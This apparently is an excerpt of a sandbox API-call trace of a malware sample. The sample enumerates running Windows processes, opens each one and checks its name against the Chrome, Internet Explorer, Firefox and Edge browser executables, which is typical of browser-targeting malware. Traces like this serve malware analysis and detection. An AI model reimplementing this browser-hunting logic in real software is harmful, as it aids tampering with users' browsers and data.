	[0236.765] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.766] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.766] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.767] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0236.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7914
	[0236.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.768] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0236.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.769] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.769] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0236.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.770] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0236.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7918
	[0236.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.772] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0236.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.772] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.773] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0236.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.773] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0236.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x791c
	[0236.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.775] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0236.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.776] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.776] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0236.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.776] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0236.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7920
	[0236.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.779] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.779] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.780] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.780] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7924
	[0236.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.782] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.782] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.783] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.783] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7928
	[0236.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.785] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.786] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.786] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.787] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.787] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x792c
	[0236.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.788] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.789] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.790] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.790] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7930
	[0236.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.792] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.792] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.794] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.795] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.795] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7934
	[0236.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.797] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.797] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.798] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.798] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7938
	[0236.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.800] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.800] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.801] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.801] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x793c
	[0236.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.803] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.803] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0236.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7940
	[0236.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.805] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0236.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.805] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.805] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0236.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.806] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.806] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7944
	[0236.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.807] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.807] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.808] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.808] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0236.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7948
	[0236.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.811] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.812] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.812] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.813] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x794c
	[0236.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.814] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.815] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.815] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.816] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.816] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7950
	[0236.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.817] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.818] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.818] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.819] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.819] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.820] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7954
	[0236.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.820] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.821] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.822] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.822] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0236.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7958
	[0236.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.824] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0236.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.824] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.825] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0236.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.825] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.825] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0236.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x795c
	[0236.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.835] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.835] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.836] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.836] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.836] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0236.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7960
	[0236.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.838] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0236.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.838] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.839] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0236.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.839] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0236.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0236.842] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0236.843] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7964
	[0236.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.843] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0236.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.844] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.845] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0236.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.846] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0236.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7968
	[0236.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.848] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0236.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.848] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.849] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0236.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.849] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0236.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x796c
	[0236.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.850] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0236.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.850] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.851] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0236.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.851] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0236.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7970
	[0236.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.853] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0236.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.854] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.855] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0236.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
